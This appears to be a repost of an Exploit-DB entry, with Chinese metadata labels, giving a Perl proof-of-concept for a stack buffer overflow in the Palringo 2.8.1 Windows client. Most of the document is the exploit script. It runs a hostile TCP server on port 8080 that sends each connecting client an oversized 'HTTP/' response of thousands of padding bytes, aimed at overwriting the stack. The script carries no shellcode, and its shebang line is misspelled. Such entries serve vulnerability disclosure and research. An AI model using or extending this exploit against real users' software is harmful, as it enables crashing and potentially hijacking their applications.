Palringo 2.8.1 – Local Stack Buffer Overflow

  • 作者: Mr.ALmfL9
    日期: 2015-01-10
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35741/
  • #!/use/bin/perl
    # Exploit Title: ‫palringo stack buffer overflow
    # Date: 10 January 2015
    # Vulnerability discovered by: Mr.ALmfL9
    # Vendor Homepage: http://www.palringo.com/
    # Software Link: http://www.palringo.com/ar/sa/download/?get=winpc
    # Version: 2.8.1
    # Tested on: Windows 8.1 
    use IO::Socket;
    $port= 8080;
    my $payload = "\x41" x 144;
    $payload = $payload. "\x42" x 4 ;
    $payload = $payload. "\x42" x 9000;
    $serv = IO::Socket::INET->new(Proto=>'tcp', LocalPort=>$port, Listen=>1) or die "Error: listen($port)\n";
    while($cli=$serv->accept()){
    print "[#] port is: $port\n";
    print $cli "HTTP/$payload\r\n\r\n";
    while(<$cli>){
    print $cli;
    
    }
    }
    #*REFERENCE*
    #.1=http://store2.up-00.com/2015-01/1420867197761.png
    #.2=http://store2.up-00.com/2015-01/1420867235381.png